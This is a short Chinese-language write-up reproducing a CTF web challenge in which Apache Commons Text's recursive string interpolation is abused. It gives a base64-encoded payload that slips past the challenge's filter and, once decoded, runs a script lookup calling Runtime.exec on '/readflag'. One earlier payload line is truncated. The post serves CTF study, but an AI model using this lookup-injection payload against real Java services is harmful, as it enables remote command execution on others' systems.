RWCTF体验赛-web-【ApacheCommandText】复现过程
![](/images/imgs/50ac4ec68298791a5339fb793e82115.jpg)
【ApacheCommandText】复现过程
官方wp出了,且web服务容器还没关,复现一把
https://mp.weixin.qq.com/s/hZBvhedDCBzEuzSd021l6Q
由于 apache common text 在默认配置下会对数据进行递归解析。这道题对一些常见利用的字符串进行了过滤,但没有过滤base64decoder,因此我们可以使用base64decoder以及递归特性进行漏洞利用。
1 | ${script:JavaScript: |
1 | ${base64decoder:JHtzY3JpcHQ6SmF2YVNjcmlwdDp2YXIgYT1qYXZhLmxhbmcuUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYygiL3JlYWRmbGFnIik7dmFyIGI9YS5nZXRJbnB1dFN0cmVhbSgpO3ZhciBjPW5ldyBqYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyKG5ldyBqYXZhLmlvLklucHV0U3RyZWFtUmVhZGVyKGIpKTtjLnJlYWRMaW5lKCk7fQ==} |
题目:
Comments